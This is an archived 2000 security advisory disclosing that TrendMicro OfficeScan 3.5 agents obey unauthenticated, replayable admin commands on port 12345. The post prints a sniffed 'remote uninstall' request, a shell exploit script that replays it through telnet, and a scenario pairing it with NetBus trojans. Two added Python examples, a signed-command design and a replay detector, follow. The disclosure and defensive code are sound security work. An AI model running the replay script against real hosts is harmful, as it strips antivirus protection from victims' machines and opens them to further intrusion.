ALERT!: TendMicro InterScan (DOS & intrusion)

From: Veille Technologique (gdnat_private)
Date: Mon Feb 28 2000 - 13:14:46 PST

    hi,
    while I continued my tests with TrendMicro OfficeScan 3.5, I tried
    something new with the anti-viral agent listening on port 12345.
    First, I sniffed an admin request from the web-based centralized server
    toward the target. This request uses the HTTP/1.0 protocol, so it is in a
    human-readable form.
    This is an example of such a tracked request, captured with the help of the very
    cool buttsniffer (BO plug-in ;) ):
    
    =======
    Source IP: x.x.x.x  Target IP: x.x.x.x
    TCP  Length: 533  Source Port: 1241  Target Port: 12345  Seq: 00815779  Ack: 01263158
    Flags: PA  Window: 8760  TCP ChkSum: 7159  UrgPtr: 0
     00000000: 47 45 54 20 2F 3F 30 35 36 38 30 46 35 34 35 45   GET /?05680F545E
     00000010: 38 38 41 45 44 35 33 39 32 42 38 38 35 45 45 37   88AED5392B885EE7
     00000020: 31 34 32 44 38 42 42 46 38 45 33 35 32 36 39 33   142D8BBF8E352693
     00000030: 37 32 35 34 33 30 44 43 31 45 37 46 39 35 34 46   725430DC1E7F954F
     00000040: 42 33 34 35 46 45 38 39 39 46 30 31 32 30 33 42   B345FE899F01203B
     00000050: 32 32 32 43 46 41 46 38 42 30 35 43 41 35 44 39   222CFAF8B05CA5D9
     00000060: 30 43 46 35 44 45 45 37 33 38 31 30 32 41 42 31   0CF5DEE738102AB1
     00000070: 43 41 45 45 45 36 32 46 37 46 34 41 41 33 36 45   CAEEE62F7F4AA36E
     00000080: 43 44 32 30 43 42 35 45 41 44 45 43 32 43 35 34   CD20CB5EADEC2C54
     00000090: 37 37 36 36 35 30 44 35 35 35 41 39 34 31 35 42   776650D555A9415B
     000000A0: 45 35 33 34 38 45 37 46 30 30 46 39 38 31 41 35   E5348E7F00F981A5
     000000B0: 44 42 45 45 31 46 33 41 42 33 30 46 41 42 43 34   DBEE1F3AB30FABC4
     000000C0: 33 33 32 33 30 46 36 36 42 34 39 39 38 32 46 44   33230F66B49982FD
     000000D0: 41 35 46 30 37 37 44 30 37 41 46 37 32 31 43 44   A5F077D07AF721CD
     000000E0: 37 39 31 38 41 35 35 38 30 43 33 33 31 42 43 34   7918A5580C331BC4
     000000F0: 43 32 41 39 35 39 42 46 36 33 34 31 31 32 42 34   C2A959BF634112B4
     00000100: 46 39 41 39 33 39 35 33 42 38 46 36 34 42 30 32   F9A93953B8F64B02
     00000110: 43 38 38 31 45 44 36 43 35 35 42 46 43 44 36 32   C881ED6C55BFCD62
     00000120: 30 35 36 31 33 34 42 42 46 38 30 30 37 45 46 46   056134BBF8007EFF
     00000130: 42 36 36 34 33 35 31 38 31 41 37 37 36 32 45 45   B66435181A7762EE
     00000140: 30 32 42 38 39 31 33 46 35 34 35 44 32 35 31 31   02B8913F545D2511
     00000150: 38 39 37 43 38 39 38 46 33 45 35 33 42 42 38 44   897C898F3E53BB8D
     00000160: 34 46 34 45 43 37 31 45 37 46 41 43 36 44 38 45   4F4EC71E7FAC6D8E
     00000170: 32 36 44 33 45 35 35 41 39 41 37 43 31 45 42 39   26D3E55A9A7C1EB9
     00000180: 36 42 44 46 44 32 42 45 38 34 34 46 43 35 45 43   6BDFD2BE844FC5EC
     00000190: 36 35 44 41 46 36 43 37 31 43 30 32 39 34 32 41   65DAF6C71C02942A
     000001A0: 39 32 42 42 39 37 38 41 43 38 37 35 31 32 30 32   92BB978AC8751202
     000001B0: 43 35 30 45 45 34 30 34 34 35 44 44 36 43 44 31   C50EE40445DD6CD1
     000001C0: 31 43 45 31 31 41 39 39 30 34 20 48 54 54 50 2F   1CE11A9904 HTTP/
     000001D0: 31 2E 30 0D 0A 48 6F 73 74 3A 20 31 30 2E 31 2E   1.0..Host: x.x.x.x
     000001E0: 36 2E 39 34 3A 31 32 33 34 35 0D 0A 55 73 65 72   :12345..User
     000001F0: 2D 41 67 65 6E 74 3A 20 4F 66 66 69 63 65 53 63   -Agent: OfficeSc
     00000200: 61 6E 2F 33 2E 35 0D 0A 41 63 63 65 70 74 3A 20   an/3.5..Accept: 
     00000210: 2A 2F 2A 0D 0A                                    */*..
    ===========
    
    Note the very big ASCII string behind the default HTML document.
    This string means, in this case: "remote un-installation of TrendMicro
    product"!
    So I replayed the same request toward another client with success. A few
    seconds later, this workstation no longer had OfficeScan
    installed on it. The product was removed from the hard disk on the target
    system.
    
    
    That attack was conducted against a Windows NT 4.0 SP5 OfficeScan 3.5;
    since the problem lies in a protocol layer, not in the system
    involved, other systems like Windows 9.x and Windows 3.x should be
    affected too.
    
    Conclusion: a malicious user is able to remotely suppress every
    OfficeScan inside the company network (stealing the admin privilege)
    without any authentication, just because this authentication is only
    used to launch the manager, not to sign or encrypt the packets.
    Because the manager is used to do other administration tasks, it may be
    possible to upload a zero-length signature file, for example.
    A dark scenario may be this one, in five steps:
    
    1- the malicious user injects a bad signature file to all the PCs
    2- then he sends his trojaned mail (with a NetBus attached) to every
    user.
    3- after a good time drinking his cola, he starts the NetBus client and looks
    for all the possibly infected stations.
    4- because 12345 is the NetBus port too, admins should not understand
    immediately that they are under attack
    5- the attacker starts his bad job.
    
    I wrote a little exploit too:
    
    #!/bin/sh
    #
    # Usage: TMKill target_ip
    # gdnat_private ( Gregory Duchemin )
    #
    # Replays the sniffed OfficeScan "remote uninstall" request against the
    # agent listening on TCP/12345 of the target. The hex string is the one
    # captured above, on a single line; the headers mirror the capture.
    (
    sleep 2
    echo "GET /?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9904 HTTP/1.0"
    echo "Host: $1:12345"
    echo "User-Agent: OfficeScan/3.5"
    echo "Accept: */*"
    echo
    # keep the connection open long enough for the agent to act, then exit
    sleep 10
    ) | telnet "$1" 12345 2>&1 | tee -a ./log.txt
    
    
    Solutions:
    
    1- contact TrendMicro.
    2- close port 12345 on all the stations, stop the service TMlisten
    in the Services menu (NT), no more network upgrades till TrendMicro
    gives us a patch.
    3- install sniffers all over the network to track possible attackers.
    
    
    ===================
    Gregory Duchemin
    Network & Security Engineer.
    gdnat_private
    http://www.securite-internet.com
    ===================
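The root cause named in the post is that the manager's login protects only the console, not the packets, so a captured command can be replayed by anyone. The following is an added example, not Trend Micro's protocol and not code from the post: it models the agent command as the hex token captured above, shows the accept-anything behaviour the post describes, and beside it a verifier that only obeys a command carrying a fresh nonce, a timestamp and an HMAC under a key shared by manager and agent. The shared key, the 30-second freshness window and the nonce cache are assumptions made for the illustration.

```python
"""Unauthenticated command replay vs. a signed, replay-resistant command.

Added example (not Trend Micro's protocol). The token is the one captured
in the post; everything else (key, window, nonce cache) is assumed.
"""
import hashlib
import hmac
import os
import time

UNINSTALL_TOKEN = (
    "05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F"
    "01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776"
    "650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721C"
    "D7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF80"
    "07EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A"
    "9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11C"
    "E11A9904"
)
KNOWN_COMMANDS = {UNINSTALL_TOKEN: "uninstall"}  # assumed command table

# Assumed secret provisioned to both manager and agent at install time.
KEY = b"manager/agent shared secret (assumption for the example)"


def legacy_agent_accepts(token: str) -> bool:
    """The behaviour the post describes: whoever sends a known command
    string is obeyed. Nothing ties the request to the manager, so a
    sniffed request replayed from any host succeeds."""
    return token in KNOWN_COMMANDS


def _message(token: str, nonce_hex: str, ts: int) -> bytes:
    # Canonical byte string covered by the MAC; '|' cannot occur in hex/ints.
    return f"{token}|{nonce_hex}|{ts}".encode()


def sign_command(token: str, key: bytes, nonce: bytes = None, ts: int = None) -> dict:
    """Manager side: bind the command to a fresh nonce and a timestamp and
    authenticate all three with HMAC-SHA256 under the shared key."""
    nonce = os.urandom(16) if nonce is None else nonce
    ts = int(time.time()) if ts is None else ts
    mac = hmac.new(key, _message(token, nonce.hex(), ts), hashlib.sha256).hexdigest()
    return {"cmd": token, "nonce": nonce.hex(), "ts": ts, "mac": mac}


class SignedAgent:
    """Agent side: obey a command only if the MAC verifies, the timestamp
    is within the window, and the nonce has not been seen before."""

    def __init__(self, key: bytes, window: int = 30):
        self.key = key
        self.window = window
        self.seen_nonces = set()  # in practice: bounded by the window, persisted

    def accept(self, req: dict, now: int = None) -> bool:
        now = int(time.time()) if now is None else now
        if req["cmd"] not in KNOWN_COMMANDS:
            return False
        expected = hmac.new(self.key, _message(req["cmd"], req["nonce"], req["ts"]),
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, req["mac"]):
            return False                      # forged or tampered
        if abs(now - req["ts"]) > self.window:
            return False                      # stale capture
        if req["nonce"] in self.seen_nonces:
            return False                      # exact replay within the window
        self.seen_nonces.add(req["nonce"])
        return True


if __name__ == "__main__":
    print("legacy agent obeys replayed token:", legacy_agent_accepts(UNINSTALL_TOKEN))
    agent = SignedAgent(KEY)
    req = sign_command(UNINSTALL_TOKEN, KEY)
    print("signed, first delivery:", agent.accept(req))
    print("signed, replayed:", agent.accept(req))
```

The timestamp alone would still leave a 30-second replay window, which is why the nonce cache is there too; and a MAC without the nonce and timestamp would only prevent forgery, not the replay the post demonstrates.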
    
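Solution 3 above is to put sniffers on the network. Since a replayed request is byte-for-byte what the manager sends (the User-Agent header is copied too), the only reliable discriminator on the wire is the source address. The following is an added example, not part of the original post: it parses requests of the captured form and raises an alert for any agent command that does not come from the management server, plus a separate alert whenever the uninstall token from the post appears, so that even a legitimate uninstall is logged. The manager address, the sample hosts and the packets are all constructed for the example.

```python
"""Flag OfficeScan agent commands on TCP/12345 that do not originate from
the manager. Added example; the manager address and the sample packets
are constructed, the uninstall token is the one captured in the post."""
import re
from dataclasses import dataclass

MANAGER_IP = "10.0.0.5"        # assumed address of the OfficeScan manager
AGENT_PORT = 12345
UNINSTALL_TOKEN = (
    "05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F"
    "01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776"
    "650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721C"
    "D7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF80"
    "07EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A"
    "9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11C"
    "E11A9904"
)

# Request line of the captured command: GET /?<hex token> HTTP/1.0
REQUEST_LINE = re.compile(r"^GET /\?([0-9A-Fa-f]+) HTTP/1\.[01]$")


@dataclass
class Alert:
    src: str
    dst: str
    reason: str
    token: str


def parse_request(payload: bytes):
    """Return (token, headers) for a request of the agent's form, else None."""
    head, _, _ = payload.partition(b"\r\n\r\n")
    try:
        lines = head.decode("ascii").split("\r\n")
    except UnicodeDecodeError:
        return None
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return m.group(1), headers


def inspect(packets):
    """packets: iterable of (src_ip, dst_ip, dst_port, tcp_payload)."""
    alerts = []
    for src, dst, dport, payload in packets:
        if dport != AGENT_PORT:
            continue
        parsed = parse_request(payload)
        if parsed is None:
            continue
        token, _headers = parsed   # User-Agent is copied by a replay: not a signal
        if src != MANAGER_IP:
            alerts.append(Alert(src, dst, "agent command from non-manager host", token))
        if token.upper() == UNINSTALL_TOKEN:
            alerts.append(Alert(src, dst, "remote uninstall command", token))
    return alerts


def build_request(host: str, token: str) -> bytes:
    """Constructed sample with the same layout as the captured request."""
    return (f"GET /?{token} HTTP/1.0\r\nHost: {host}:12345\r\n"
            f"User-Agent: OfficeScan/3.5\r\nAccept: */*\r\n\r\n").encode()


# Constructed traffic, not a real capture: (src_ip, dst_ip, dst_port, payload)
SAMPLE_PACKETS = [
    ("10.0.0.5",  "10.0.0.21", 12345, build_request("10.0.0.21", UNINSTALL_TOKEN)),
    ("10.0.0.99", "10.0.0.22", 12345, build_request("10.0.0.22", UNINSTALL_TOKEN)),
    ("10.0.0.99", "10.0.0.22", 80,    b"GET / HTTP/1.0\r\n\r\n"),
    ("10.0.0.99", "10.0.0.23", 12345, b"\x00\x01not an agent request"),
    ("10.0.0.5",  "10.0.0.24", 12345, build_request("10.0.0.24", "DEADBEEF")),
]

if __name__ == "__main__":
    for a in inspect(SAMPLE_PACKETS):
        print(f"{a.src} -> {a.dst}: {a.reason}")
```

Expected on the sample: one "remote uninstall command" from the manager (audit), and two alerts for 10.0.0.99, which both sent a command from a non-manager host and sent the uninstall token; the port-80 request, the non-HTTP payload and the manager's other command raise nothing.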



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:38:05 PDT